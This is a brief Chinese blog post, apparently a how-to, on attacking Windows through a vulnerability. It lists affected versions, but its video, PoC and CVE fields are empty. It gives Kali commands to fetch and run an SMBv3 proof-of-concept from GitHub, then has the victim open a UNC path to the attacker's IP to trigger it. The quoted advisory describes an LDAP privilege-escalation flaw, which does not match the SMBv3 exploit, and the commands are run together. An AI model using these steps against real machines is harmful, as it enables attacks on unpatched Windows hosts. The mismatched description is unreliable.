本文共 719 字,大约阅读时间需要 2 分钟。
视频教程:
poc地址:
受影响系统:
Microsoft Windows VistaMicrosoft Windows Server 2016Microsoft Windows Server 2012 R2Microsoft Windows Server 2012Microsoft Windows Server 2008Microsoft Windows RT 8.1Microsoft Windows 8.1Microsoft Windows 7Microsoft Windows 10描述:BUGTRAQ ID: CVE(CAN) ID: Microsoft Windows是流行的计算机操作系统。Microsoft Windows未正确计算LDAP请求缓冲区长度,在实现上存在权限提升漏洞,可使攻击者在提升的上下文中运行进程。<来源:Microsoft 链接:>
下载到kali,并运行:
cd /tmpwget -c --no-check-certificate https://github.com/lgandx/PoC/archive/master.zipunzip PoC-master.zipcd PoC-master/cd SMBv3。。。。。剩下table自动补齐python odict.pypython win10.py
如果没有触发,就Windows的运行窗口下。
\\攻击者ip\
触发一下。